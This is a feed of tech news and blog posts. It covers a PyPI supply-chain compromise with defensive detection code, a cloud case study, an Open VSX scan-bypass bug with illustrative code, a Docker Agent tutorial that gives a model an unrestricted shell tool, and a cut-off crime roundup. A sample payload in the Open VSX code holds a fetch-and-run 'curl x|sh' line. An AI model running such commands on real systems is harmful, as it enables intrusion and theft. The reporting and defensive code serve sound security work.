Friday, March 27, 2026

TeamPCP Pushes Malicious Telnyx Versions to PyPI, Hides Stealer in WAV Files

TeamPCP, the threat actor behind the supply chain attack targeting Trivy, KICS, and litellm, has now compromised the telnyx Python package by pushing two malicious versions to steal sensitive data.

The two versions, 4.87.1 and 4.87.2, published to the Python Package Index (PyPI) on March 27, 2026, concealed their credential-harvesting payload inside a .WAV file. Users are advised to downgrade to version 4.87.0 immediately. The PyPI project is currently quarantined.

Various reports from Aikido, Endor Labs, Ossprey Security, SafeDep, Socket, and StepSecurity indicate the malicious code is injected into "telnyx/_client.py," causing it to be invoked when the package is imported into a Python application. The malware is designed to target Windows, Linux, and macOS systems.

"Our analysis reveals a three-stage runtime attack chain on Linux/macOS consisting of delivery via audio steganography, in-memory execution of a data harvester, and encrypted exfiltration," Socket said. "The entire chain is designed to operate within a self-destructing temporary directory and leave near-zero forensic artifacts on the host."

On Windows, the malware downloads a file named "hangup.wav" from a command-and-control (C2) server and extracts from the audio data an executable that's then dropped into the Startup folder as "msbuild.exe." This allows it to persist across system reboots and automatically run every time a user logs in to the system.

If the compromised host runs Linux or macOS, the malware instead fetches a different .WAV file ("ringtone.wav") from the same server, extracts a third-stage collector script from it, and runs it. The credential harvester captures a wide range of sensitive data and exfiltrates it as "tpcp.tar.gz" via an HTTP POST request to "83.142.209[.]203:8080."

"The standout technique in this sample - and the reason for the post title - is the use of audio steganography to deliver the final payload," Ossprey Security said. "Rather than hosting a raw executable or a base64 blob on the C2 (both of which are trivially flagged by network inspection and EDR), the attacker wraps the payload inside a .WAV file."
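A quick structural triage of a suspicious audio file is a useful first step when a package fetches a .WAV and then "extracts" something from it. The following Python is an added example, not code from the article or from any of the vendors cited, and it does not model TeamPCP's actual embedding scheme (which the reports above do not describe): it walks the RIFF chunk list and reports three generic indicators, bytes appended after the declared RIFF structure, chunk IDs a normal encoder would not write, and chunks whose declared size runs past end of file. Sample-level (LSB) steganography would not show up here and needs audio statistics instead. The build_wav helper and its inputs are constructed test data.

```python
import struct

# Chunk IDs a normal WAV encoder writes; anything else deserves a look.
EXPECTED_CHUNKS = {b"fmt ", b"data", b"LIST", b"fact", b"PEAK", b"cue ", b"bext", b"id3 "}


def walk_riff(data: bytes):
    """Yield (chunk_id, payload_offset, declared_size) for each chunk in the RIFF body."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_size = struct.unpack_from("<I", data, 4)[0]
    body_end = min(len(data), 8 + riff_size)
    pos = 12
    while pos + 8 <= body_end:
        chunk_id = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield chunk_id, pos + 8, size
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to an even length


def triage_wav(data: bytes) -> dict:
    """Return structural indicators that a WAV carries more than audio."""
    chunks = list(walk_riff(data))  # validates the header first
    riff_size = struct.unpack_from("<I", data, 4)[0]
    declared_end = 8 + riff_size
    findings = {
        "trailing_bytes": max(0, len(data) - declared_end),  # appended after the RIFF structure
        "unexpected_chunks": [],                              # IDs a normal encoder would not write
        "truncated_chunks": [],                               # declared size runs past end of file
    }
    for chunk_id, offset, size in chunks:
        if chunk_id not in EXPECTED_CHUNKS:
            findings["unexpected_chunks"].append(chunk_id.decode("latin-1"))
        if offset + size > len(data):
            findings["truncated_chunks"].append(chunk_id.decode("latin-1"))
    findings["suspicious"] = bool(
        findings["trailing_bytes"] or findings["unexpected_chunks"] or findings["truncated_chunks"]
    )
    return findings


def build_wav(pcm: bytes, sample_rate: int = 8000, extra_chunks=(), trailer: bytes = b"") -> bytes:
    """Constructed test input: minimal 16-bit mono PCM WAV, optionally with extra chunks or a trailer."""
    fmt = struct.pack("<HHIIHH", 1, 1, sample_rate, sample_rate * 2, 2, 16)
    body = b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
    for chunk_id, payload in extra_chunks:
        body += chunk_id + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")
    body += b"data" + struct.pack("<I", len(pcm)) + pcm + (b"\x00" if len(pcm) & 1 else b"")
    return b"RIFF" + struct.pack("<I", len(body)) + body + trailer


if __name__ == "__main__":
    silence = b"\x00\x00" * 100
    print("clean   :", triage_wav(build_wav(silence)))
    print("appended:", triage_wav(build_wav(silence, trailer=b"MZ" + b"\x00" * 62)))
    print("extra   :", triage_wav(build_wav(silence, extra_chunks=[(b"junk", b"\x7fELF" + b"\x00" * 28)])))
```

Run it against the dropped file (`triage_wav(open("hangup.wav", "rb").read())`); a non-zero `trailing_bytes` or an unexpected chunk ID is enough to pull the file into a sandbox rather than trusting its extension.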

It's currently not known how TeamPCP obtained the package's PYPI_TOKEN, but it was likely taken in a prior credential-harvesting operation.

"We believe the most likely vector is the litellm compromise itself," Endor Labs researchers Kiran Raj and Rachana Misal said. "TeamPCP's harvester swept environment variables, .env files, and shell histories from every system that imported litellm. If any developer or CI pipeline had both litellm installed and access to the telnyx PyPI token, that token was already in TeamPCP's hands."

What's notable about the attack is the absence of a persistence mechanism on Linux and macOS: the malware carries out its actions inside a temporary directory and recursively deletes its contents once everything is complete.

"The strategic split is clear. Windows gets persistence: a binary in the Startup folder that survives reboots, providing the threat actor with long-term, repeatable access," Socket explained. "Linux/macOS gets smash-and-grab: a single, high-speed data harvesting operation that collects everything of value and exfiltrates it immediately, then vanishes."

The development comes a few days after the threat actor distributed trojanized versions of the popular litellm Python package to exfiltrate cloud credentials, CI/CD secrets, and keys to a domain under its control.

The supply chain incident also reflects a maturation of the threat actor's tradecraft: it has consistently infected legitimate, trusted packages with large user bases to distribute malware to downstream users and widen the blast radius, rather than directly publishing malicious typosquats to open-source package repositories.

"The target selection across this campaign focuses on tools with elevated access to automated pipelines: a container scanner (Trivy), an infrastructure scanning tool (KICS), and an AI model routing library (litellm)," Snyk said. "Each of these tools requires broad read access to the systems it operates on (credentials, configs, environment variables) by design."

To mitigate the threat, developers are advised to perform the following actions -

  • Audit Python environments, requirements.txt files, and lock files for telnyx==4.87.1 or telnyx==4.87.2. If found, replace them with version 4.87.0 and reinstall.
  • Assume compromise of any host that imported the malicious versions and rotate every secret it could reach.
  • On Windows, look for a file named "msbuild.exe" in the Startup folder; it runs at every user logon.
  • Block the C2 and exfiltration address (83.142.209[.]203, port 8080 for the HTTP POST exfiltration).
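The audit in the first bullet can be scripted. The Python below is an added example (not from the advisory or from any of the cited vendors) that scans a requirements.txt or `pip freeze` listing for exact pins of the two compromised releases, flags telnyx lines that are not exactly pinned (those resolve at install time, so the lock file or the installed version is what must be checked), and classifies the version importlib.metadata reports for the current environment. SAMPLE_REQS is constructed sample input.

```python
import re
from importlib import metadata
from typing import Optional

PACKAGE = "telnyx"
COMPROMISED = {"4.87.1", "4.87.2"}   # releases named in the advisory
CLEAN_PIN = "4.87.0"                 # the version the advisory says to downgrade to

# requirement line: name, optional extras, exact pin operator (== or ===), version
_EXACT_PIN = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*={2,3}\s*(?P<version>[0-9][0-9A-Za-z.+!-]*)$"
)
_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*")


def normalize(name: str) -> str:
    """PEP 503 name normalisation so Telnyx, telnyx and TELNYX compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_requirements(text: str) -> dict:
    """Scan requirements.txt / `pip freeze` text for the compromised telnyx releases.

    Returns {"compromised": [(line_no, line)], "unpinned": [(line_no, line)]}:
    exact pins of a bad release, and telnyx lines that are not exact pins
    (ranges, bare names, ~= specs) whose resolved version must be checked elsewhere.
    """
    result = {"compromised": [], "unpinned": []}
    for line_no, raw in enumerate(text.splitlines(), start=1):
        spec = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments and env markers
        spec = re.split(r"\s+--", spec)[0]                    # drop --hash= and similar options
        if not spec or spec.startswith("-"):                  # blank, -r, -e, --index-url ...
            continue
        name = _NAME.match(spec)
        if not name or normalize(name.group(0)) != PACKAGE:
            continue
        pin = _EXACT_PIN.match(spec)
        if pin is None:
            result["unpinned"].append((line_no, raw.rstrip()))
        elif pin.group("version") in COMPROMISED:
            result["compromised"].append((line_no, raw.rstrip()))
    return result


def classify_version(version: Optional[str]) -> str:
    """'absent', 'compromised' or 'clean' for a version string (None = not installed)."""
    if version is None:
        return "absent"
    return "compromised" if version in COMPROMISED else "clean"


def installed_status() -> str:
    """Classify the telnyx distribution installed in the current interpreter, if any."""
    try:
        return classify_version(metadata.version(PACKAGE))
    except metadata.PackageNotFoundError:
        return classify_version(None)


# Constructed sample of a requirements file touched by a dependency bump.
SAMPLE_REQS = """\
requests==2.32.3
Telnyx [ext] == 4.87.2  # bumped last week
telnyx==4.87.0 ; python_version < "3.9"
telnyx>=4.80
telnyx
"""

if __name__ == "__main__":
    print(audit_requirements(SAMPLE_REQS))
    print("installed telnyx:", installed_status())
    # remediation per the advisory: pip install "telnyx==4.87.0", then rotate every secret the host held
```

Run `installed_status()` inside each virtualenv and CI image, not just on the developer machine: the advisory's point is that the code fires on import, so the environments that actually executed `import telnyx` are the ones whose secrets need rotating.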

The compromise is part of a broader, ongoing campaign undertaken by TeamPCP spanning multiple ecosystems, with the threat actor announcing collaborations with other cybercriminal groups like LAPSUS$ and an emerging ransomware group called Vect to conduct extortion and ransomware operations.

This also signals a shift: ransomware gangs, which have historically relied on initial access methods like phishing and exploitation of security flaws, are now weaponizing supply chain attacks on open-source infrastructure as an entry point for follow-on attacks.

"This puts a spotlight on anything in CI/CD environments that isn’t locked down," Socket said. "Security scanners, IDE extensions, build tooling, and execution environments are granted broad access because they’re expected to need it. When attackers are targeting the tools themselves, anything running in the pipeline has to be treated as a potential entry point."



from The Hacker News https://ift.tt/LBWlVR5
via IFTTT

LAB3 accelerates cloud modernization with HashiCorp-powered unified workflows

What usually begins as an effort to escape slow, ticket-driven cloud operations often becomes something much more transformative. For enterprises working with LAB³, modernizing provisioning and security quickly evolves into establishing a unified workflow across infrastructure, secrets, and networking — a foundation that enables true cloud velocity and unlocks new possibilities for AI and next-generation architectures.

This blog breaks down LAB³’s modernization philosophy, based on real-world insights from Lachlan White, Chief Technology Officer at LAB³ and long-time HashiCorp Ambassador turned IBM Champion.

Challenge: Cloud adoption stalled by manual processes

Many enterprises assume they’ve modernized simply because their workloads now run in the cloud. But when LAB³ begins assessing their environments, a different reality emerges: Provisioning still runs through manual, ticket-driven workflows, secrets are rotated by hand, and networking changes require slow, error-prone coordination across teams.

According to White, this creates an illusion of progress rather than true cloud transformation:

“Taking six weeks to build a server was good. Now they’re in cloud, it takes three weeks — but we know it can take three minutes.” — Lachlan White, CTO, LAB³

The root problem isn’t cloud adoption, but the lack of shared patterns and foundational standards. Without consistent IaC practices, each team builds infrastructure differently, driving drift, inconsistent security, and bottlenecks across hybrid and multi-cloud environments. When AI enters the picture, these problems escalate further.

Key limitations LAB³ sees most often:

  • Manual provisioning and ticket queues slowing delivery

  • Secrets stored or rotated manually, often inconsistently

  • Fragmented networking practices across clouds

  • No shared IaC patterns, causing drift and duplicated work

  • Risk-averse processes that limit autonomy and innovation

Crawl: Establishing foundations

In the crawl stage, LAB³ focuses on rebuilding the basics: shared architectural patterns, consistent use of IBM Terraform on the HashiCorp Cloud Platform, and reliable secrets management. In this phase, the team stabilizes the environment, reduces risk, and ensures teams have a strong foundation before automation is scaled.

Walk: Standardization as the catalyst for velocity

Reaching the walk stage marks a turning point. LAB³ helps teams shift from ad hoc, inconsistent builds to a unified, scalable operating model:

  • IBM Terraform introduces reusable, well-architected modules
  • IBM Vault embeds proper rotation and access controls into workflows
  • IBM Consul aligns networking practices across distributed environments

As White notes, this stage is about efficiency, not for its own sake, but to accelerate time-to-market:

“The walk phase is about making it efficient rather than just doing it because we’ve been told it’s a good practice.” — Lachlan White, CTO, LAB³

Run: Platforms ready for innovation at scale

By the run stage, organizations operate like modern engineering teams. LAB³ introduces platform engineering practices, FinOps feedback loops, and advanced Vault and Consul capabilities. This unlocks new space for innovation, from AI frameworks to event-driven architectures. Or as White puts it, LAB³ helps teams explore “the art of the possible.”

One cloud experience, everywhere

LAB³’s transformational model is powered by the HashiCorp ecosystem, enabling enterprises to orchestrate infrastructure, security, and connectivity through one consistent workflow across every cloud and every stage of their modernization journey.

Terraform: Standardized infrastructure delivery

Terraform replaces fragmented, manually built environments with reusable, standardized modules that scale across teams and clouds. By adopting architectural blueprints and well-architected modules, organizations typically see provisioning speed improve by around 70%, reducing delivery from weeks to minutes.

This level of automation and consistency ensures infrastructure is governed, repeatable, and ready to support AI-driven workloads.

Vault: Secure, automated secrets management

Vault centralizes secrets and automates rotation, eliminating the risks associated with manual handling. As teams grow and workloads diversify, Vault provides least-privilege access and the auditability required for compliance.

Consul: Reliable, consistent service connectivity

Consul brings structure to distributed networking — service discovery, routing, and Terraform Sync — ensuring that applications communicate predictably in hybrid and multi-cloud environments.

“The amalgamation of all HashiCorp products enables us to get a unified workflow. We're able to give the developers and the engineers a single unified tool set and experience to extract the value of all of the abstraction we're putting into the platform.” — Lachlan White, CTO, LAB³

Together, these tools form a unified cloud operating model that spans infrastructure, security, and networking, reducing operational overhead by 30-50%.

A cloud platform you can bank on

Nowhere was this transformation more visible than at a major Australian bank. With hundreds of engineering teams working independently, cloud adoption outpaced consistency, and operational overhead grew as AI workloads arrived.

LAB³ responded by rebuilding the foundations:

  • Terraform to unify provisioning and enforce RBAC

  • IaC baselines to eliminate one-off templates and drift

  • Vault to centralize secrets and automate rotation

  • A curated AI environment for safe, rapid experimentation

White describes the moment the team reset the foundation:

“We weren’t provisioning any of the infrastructure through IaC, so we went back to square one — put everything into HCP Terraform with proper RBAC, then brought in Vault so we weren’t exposing things we didn’t want to.” — Lachlan White, CTO, LAB³

With these systems in place, the bank gained a secure, standardized platform that now powers its emerging AI workloads and is being expanded across its broader ecosystem.

Results:

  • Provisioning drops from weeks to minutes with standardized Terraform automation

  • Secrets are governed and automated via Vault

  • Networking becomes consistent and predictable with Consul

  • Delivery accelerates with pre-approved templates and guardrails

  • Operational overhead shrinks as manual processes are removed

Gearing up for the next wave of intelligent systems

Looking ahead, LAB³ is preparing clients for the next generation of cloud-native innovation — from AI and agentic systems to microservices, event-driven architectures, and beyond.

White sees this shift clearly: “AI dramatically increases the speed of change and the surface area of access across modern platforms. As agents, pipelines, and services are introduced at pace, non-human identity becomes the dominant security challenge. Vault enables workload-based authentication and short-lived credentials, giving teams the freedom to adopt new tools quickly without relying on long-lived shared secrets.”

In order to benefit from these emerging technologies, though, White emphasizes that enterprises need to invest in strong foundations today:

“You want to look at these capabilities because they provide the foundational layer for your enterprise's technology stack to address the value of new trends in markets such as artificial intelligence,” he says and then adds, “we can apply some of the security and automation lessons, and even look to add AI to those foundational elements to increase the velocity at which we can develop.”

LAB³ plans to extend AI into the platform itself by:

  • Automating Terraform module creation and config validation

  • Enhancing security through AI-driven anomaly detection

  • Improving developer experience with intelligent IDE guardrails

  • Enabling agent-based architectures requiring dynamic trust and ephemeral environments

What’s more, they’ve now incorporated agentic AI to further increase productivity gains with the Terraform MCP Server as they enable an agentic workforce to amplify the benefits of their deep technical expertise at scale.

The HashiCorp ecosystem remains critical to these ambitions, ensuring that the underlying platform is stable, secure, and adaptable enough to support whatever comes next.

You can read the full story on our Case study library (no registration):



from HashiCorp Blog https://ift.tt/5QCIfHX
via IFTTT

Open VSX Bug Let Malicious VS Code Extensions Bypass Pre-Publish Security Checks

Cybersecurity researchers have disclosed details of a now-patched bug in Open VSX's pre-publish scanning pipeline that could allow a malicious Microsoft Visual Studio Code (VS Code) extension to pass the vetting process and go live in the registry.

"The pipeline had a single boolean return value that meant both 'no scanners are configured' and 'all scanners failed to run,'" Koi Security researcher Oran Simhony said in a report shared with The Hacker News. "The caller couldn't tell the difference. So when scanners failed under load, Open VSX treated it as 'nothing to scan for' and waved the extension right through."

Early last month, the Eclipse Foundation, which maintains Open VSX, announced plans to enforce pre-publish security checks before VS Code extensions are published to the repository in an attempt to tackle the growing problem of malicious extensions.

With Open VSX also serving as the extension marketplace for Cursor, Windsurf, and other VS Code forks, the move was seen as a proactive approach to prevent rogue extensions from getting published in the first place. As part of pre-publish scanning, extensions that fail the process are quarantined for admin review.

The vulnerability discovered by Koi, codenamed Open Sesame, has to do with how this Java-based service reports scan results. Specifically, it misinterpreted scanner job failures as "no scanners configured," causing an extension to be marked as passed and then immediately activated and made available for download from Open VSX.

The same return value therefore also covered the case where scanners existed but their jobs could not be enqueued because the database connection pool was exhausted. Even more troublingly, a recovery service designed to retry failed scans suffered from the same problem, allowing extensions to skip the entire scanning process under certain conditions.

An attacker can take advantage of this weakness to flood the publish endpoint with several malicious .VSIX extensions, causing the concurrent load to exhaust the database connection pool. This, in turn, leads to a scenario where scan jobs fail to enqueue.

What's notable about the attack is that it does not require any special privileges. A malicious actor with a free publisher account could have reliably triggered this vulnerability to undermine the scanning process and get their extension published. The issue was addressed in Open VSX version 0.32.0 last month following responsible disclosure on February 8, 2026.

"Pre-publish scanning is an important layer, but it's one layer," Koi said. "The pipeline's design is sound, but a single boolean that couldn't distinguish between 'nothing to do' and 'something went wrong' turned the entire infrastructure into a gate that opened under pressure."

"This is a common anti-pattern: fail-open error handling hiding behind a code path designed for a legitimate 'nothing to do' case. If you're building similar pipelines, make failure states explicit. Never let 'no work needed' and 'work failed' share a return value."
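The anti-pattern Koi describes is easy to reproduce. The Python below is an added illustration, not Open VSX's code: a toy connection pool that refuses new scan jobs once it is exhausted, a scanner gate that collapses "no findings", "no scanners configured" and "no job could be enqueued" into one True, and a rewrite that returns an explicit outcome so that only an affirmative CLEAN verdict activates the extension. The scanner, the pool and the extension records are constructed for the example.

```python
from enum import Enum, auto


class PoolExhausted(RuntimeError):
    """Raised when no database connection is free to enqueue a scan job."""


class ConnectionPool:
    """Constructed stand-in for a DB connection pool: `free` connections are
    available; a flood of concurrent publishes would drive this to zero."""

    def __init__(self, free: int):
        self.free = free

    def submit(self, scanner, extension) -> bool:
        if self.free <= 0:
            raise PoolExhausted("scan job could not be enqueued")
        self.free -= 1
        try:
            return scanner(extension)  # True = no findings
        finally:
            self.free += 1


def signature_scanner(extension: dict) -> bool:
    """Toy scanner, constructed for the example: clean unless the package spawns a shell."""
    return b"child_process" not in extension["payload"]


# --- vulnerable gate: one boolean for three different situations ---------------

def run_scans_vulnerable(extension, scanners, pool: ConnectionPool) -> bool:
    clean = True
    for scanner in scanners:
        try:
            clean = clean and pool.submit(scanner, extension)
        except PoolExhausted:
            continue  # failure is swallowed; nothing records that the scan never ran
    return clean      # True for "no findings", "no scanners" and "nothing ran" alike


def publish_vulnerable(extension, scanners, pool) -> str:
    return "activate" if run_scans_vulnerable(extension, scanners, pool) else "quarantine"


# --- hardened gate: failure states are explicit and the decision fails closed --

class ScanOutcome(Enum):
    CLEAN = auto()
    FLAGGED = auto()
    NO_SCANNERS = auto()
    SCAN_FAILED = auto()


def run_scans_hardened(extension, scanners, pool: ConnectionPool):
    """Return (outcome, details); details names the scanners that flagged or failed."""
    if not scanners:
        return ScanOutcome.NO_SCANNERS, []
    flagged, failed = [], []
    for scanner in scanners:
        try:
            if not pool.submit(scanner, extension):
                flagged.append(scanner.__name__)
        except PoolExhausted:
            failed.append(scanner.__name__)
    if flagged:
        return ScanOutcome.FLAGGED, flagged
    if failed:
        return ScanOutcome.SCAN_FAILED, failed
    return ScanOutcome.CLEAN, []


def publish_hardened(extension, scanners, pool) -> str:
    outcome, _ = run_scans_hardened(extension, scanners, pool)
    # Only an affirmative CLEAN verdict activates; NO_SCANNERS and SCAN_FAILED are
    # held for admin review or retry instead of being read as "nothing to do".
    return "activate" if outcome is ScanOutcome.CLEAN else "quarantine"


if __name__ == "__main__":
    evil = {"name": "evil.vsix", "payload": b"require('child_process').exec('curl x|sh')"}
    print("vulnerable, pool exhausted:", publish_vulnerable(evil, [signature_scanner], ConnectionPool(free=0)))
    print("hardened,   pool exhausted:", publish_hardened(evil, [signature_scanner], ConnectionPool(free=0)))
```

The retry service Koi mentions would plug into the hardened version by re-enqueuing anything that came back SCAN_FAILED; with the boolean version there is nothing left to retry, because the failure was already reported as success.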



from The Hacker News https://ift.tt/bYWOLQp
via IFTTT

Building a News Roundup with Docker Agent, Docker Model Runner, and Skill

Hello, I’m Philippe, and I am a Principal Solutions Architect helping customers with their usage of Docker. I wanted a lightweight way to automate my IT news roundups without burning through AI credits. So I built a Docker Agent skill that uses the Brave Search API to fetch recent articles on a topic, then hands the results to a local model running with Docker Model Runner to analyze the stories and generate a Markdown report.

In this setup, Qwen3.5-4B handles the reasoning and skill invocation, while the skill itself does the retrieval work. The result is a simple local workflow for turning a prompt like “use news roundup skill with tiny language models” into a structured news brief I can save, review, and reuse.

It is a bit slower than doing the same thing with Claude Code, but that tradeoff works for me: I keep the workflow local, I save my Claude credits, and I get a practical example of how skills make Docker Agent more useful for repeatable tasks.

Prerequisites for building the news roundup:

  • Docker and Docker Compose, obviously.
  • A Brave Search account with an API key (you can get one here). (There’s a free plan.)
  • A local model that supports a large context window and knows how to do function calling.

I chose to use qwen3.5-4b from Qwen (I went with the Unsloth version), a 4-billion-parameter model optimized for text understanding and generation, with native support for up to 262144 context tokens.

I started my tests with qwen3.5-9b, but on my MacBook Air, it’s a bit slow and qwen3.5-4b does the job just fine.

Let’s get into the setup.

Step-by-step guide to building the news roundup

Step 1: Creating the Dockerfile

I used an ubuntu:22.04 base image and installed curl to make requests to the Brave Search API. I also copied the docker-agent binary from the docker/docker-agent:1.32.5 image to run the agents.

FROM --platform=$BUILDPLATFORM docker/docker-agent:1.32.5 AS coding-agent

FROM --platform=$BUILDPLATFORM ubuntu:22.04 AS base

LABEL maintainer="@k33g_org"
ARG TARGETOS
ARG TARGETARCH

ARG USER_NAME=docker-agent-user

ARG DEBIAN_FRONTEND=noninteractive

ENV LANG=en_US.UTF-8
ENV LANGUAGE=en_US.UTF-8
ENV LC_COLLATE=C
ENV LC_CTYPE=en_US.UTF-8

# ------------------------------------
# Install Tools
#------------------------------------
RUN <<EOF
apt-get update
apt-get install -y wget curl
apt-get clean autoclean
apt-get autoremove --yes
# heredoc RUN steps execute under /bin/sh (dash), which has no brace expansion,
# so the apt lists are removed with an explicit path
rm -rf /var/lib/apt/lists/*
EOF

# ------------------------------------
# Install docker-agent
# ------------------------------------
COPY --from=coding-agent /docker-agent /usr/local/bin/docker-agent

# ------------------------------------
# Create a new user
# ------------------------------------
# non-interactive: no password prompt, empty GECOS, so the build does not block on stdin
RUN adduser --disabled-password --gecos "" ${USER_NAME}
# Set the working directory
WORKDIR /home/${USER_NAME}
# Set the user as the owner of the working directory
RUN chown -R ${USER_NAME}:${USER_NAME} /home/${USER_NAME}
# Switch to the regular user
USER ${USER_NAME}

Let’s move on to the agent configuration.

Step 2: Creating the Docker Agent configuration file

For the Docker Agent configuration, I defined a root agent using the brain model, which is an alias for qwen3.5-4b. I also enabled skills support (skills: true) and provided detailed instructions so the agent behaves like an expert IT journalist, capable of searching, analyzing, and summarizing the latest tech news.

For the toolsets, Docker Agent ships with some ready-to-use ones, but I preferred a script-type toolset with an execute_command that can run any shell command and capture its output. This gives me the flexibility to interact with the Brave Search API directly from shell commands, without having to implement specific tools for it, and most importantly it keeps the agent's instructions lightweight. Note that this hands the model an unrestricted shell: whatever command it proposes runs as the container user with the Brave API key in its environment, so the container boundary (a non-root user, read-only mounts for the config and skills, a single writable data volume) is what limits the blast radius, and it is worth validating each proposed command manually until you trust the workflow.

agents:
  root:

    model: brain
    description: News Roundup Expert
    skills: true
    instruction: |
      You are an expert IT journalist with deep knowledge of software engineering, cloud infrastructure, artificial intelligence, cybersecurity, and the open-source ecosystem.
      Your role is to gather, analyze, and summarize the latest technology news in a clear, accurate, and engaging way.
      You write for a technical audience and always provide context, highlight trends, and explain the impact of each piece of news.

    toolsets:
      - type: script
        shell:

          execute_command:
            description: Execute a shell command and return its stdout and stderr output.
            args:
              command:
                description: The shell command to execute.
            cmd: |
              bash -c "$command" 2>&1

models:

  brain:
    provider: dmr
    model: huggingface.co/unsloth/qwen3.5-4b-gguf:Q4_K_M
    temperature: 0.0
    top_p: 0.95
    presence_penalty: 1.5
    provider_opts:
      # llama.cpp flags
      runtime_flags: ["--context_size=65536"]

Now let’s look at the skill.

Step 3: Building the news roundup skill

I created a news-roundup skill that uses the Brave Search API to search for the latest news on a given topic, enriches each article with additional web searches, and generates a structured Markdown report.

Inside the .agents/skills folder, I created a news-roundup directory with a SKILL.md file that describes the skill in detail, with the steps to follow and the commands to execute at each step.

├── .agents
│   └── skills
│       └── news-roundup
│           └── SKILL.md

Here’s the content of SKILL.md:

---
name: news-roundup
description: search the news using Brave News Search API with a query as argument. Use this skill when the user asks to search for recent news or current events.
---
# News Roundup

## Purpose

Generate a comprehensive Markdown news report on a given topic (default: "small ai local models").

## Steps to follow

### Step 1 — Search for recent news

#### Command to execute

```bash
# -G sends the --data-urlencode values as a properly encoded query string,
# so a topic containing &, # or non-ASCII characters cannot break the request
curl -s -G "https://api.search.brave.com/res/v1/news/search" \
  --data-urlencode "q=${ARGUMENTS_REST}" \
  -d count=3 -d freshness=pw \
  -H "X-Subscription-Token: ${BRAVE}" \
  -H "Accept: application/json"
```

### Step 2 — Enrich each article

For each article returned in Step 1, use the below command with the article URL to retrieve additional context and details.

#### Command to execute

```bash
curl -s -G "https://api.search.brave.com/res/v1/web/search" \
  --data-urlencode "q=${ARTICLE_URL}" \
  -d count=10 \
  -H "X-Subscription-Token: ${BRAVE}" \
  -H "Accept: application/json"
```

### Step 3 — Generate the Markdown report

Using all the collected information, write a well-structured Markdown report; the file name and location to save it under are given after the template below.

The report must follow this structure:

```markdown
# IT News Report — {topic}

> Generated on {date}

## Summary

A short paragraph summarizing the main trends found across all articles.

## Articles

### {Article Title}

- **Source**: {source name}
- **URL**: {url}
- **Published**: {date}

{2-3 sentence summary of the article content and its significance for IT professionals}

---

(repeat for each article)

## Key Trends

A bullet list of the main technology trends identified across all articles.
```

Save the final report to `/workspace/data/news-report-{YYYYMMDD-HHMMSS}.md` using the `write_file` tool, where `{YYYYMMDD-HHMMSS}` is the current date and time (e.g. `news-report-20260318-143012.md`).
To get the current timestamp, run:

```bash
date +"%Y%m%d-%H%M%S"
```

All that’s left is to create the compose.yml file to launch the agent.

Step 4: Updating the compose.yml file

Here’s the content of compose.yml. 

Note: you’ll need a .env file with your Brave Search API key (e.g. BRAVE=abcdef1234567890).

services:
  news-roundup:
    build:
      context: .
      dockerfile: Dockerfile
    stdin_open: true
    tty: true
    command: docker-agent run /workspace/config.yaml
    volumes:
      - ./config.yaml:/workspace/config.yaml:ro
      - ./.agents:/workspace/.agents:ro
      - ./data:/workspace/data
    working_dir: /workspace

    env_file:
      - .env

    models:
      qwen3.5-4b:

models:

  qwen3.5-4b:
    model: huggingface.co/unsloth/qwen3.5-4b-gguf:Q4_K_M
    context_size: 65536

And that’s it — everything we need to run our IT news roundup agent.

Step 5: Let’s test it out!

Just run the following command in your terminal:

docker compose run --rm --build news-roundup

And ask the agent:

use news roundup skill with tiny language models

The agent will then execute the news-roundup skill, query the Brave Search API, analyze the articles, and generate a Markdown report in the data folder. 

Note: this can take a little while, so feel free to grab a coffee (or get some work done).

The agent will detect that it needs to run tools (the curl commands from the news-roundup skill) — you can validate each command manually or let the agent run them automatically: 

Skills newsround fig 1

Your agent will work for a few minutes…

Skills newsround fig 2


…and at the end, it will give you the path of the generated report, which you can open to read your personalized IT news roundup:

Skills newsround fig 3

You can find examples of generated reports in the data folder of the project on this repository: https://codeberg.org/docker-agents/news-roundup/src/branch/main/data.

Final Thoughts 

That’s the full setup: a Docker Agent skill for news retrieval, the Brave Search API for fresh articles, and Docker Model Runner with Qwen3.5-4B for local analysis and report generation.

You now have a fully local IT news roundup agent. I have written a lot of content on use cases for local models, including context packaging and making small LLMs smarter. See you soon for more Docker Agent use cases with local language models!



from Docker https://ift.tt/lGBODQj
via IFTTT

The Good, the Bad and the Ugly in Cybersecurity – Week 13

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has given Russian national Aleksey Volkov almost seven years in prison and ordered him to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments of up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have handed down two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the United States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement has also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware, and laundered the illicit proceeds. The operations enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

Source: FBI Instagram

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Resumes

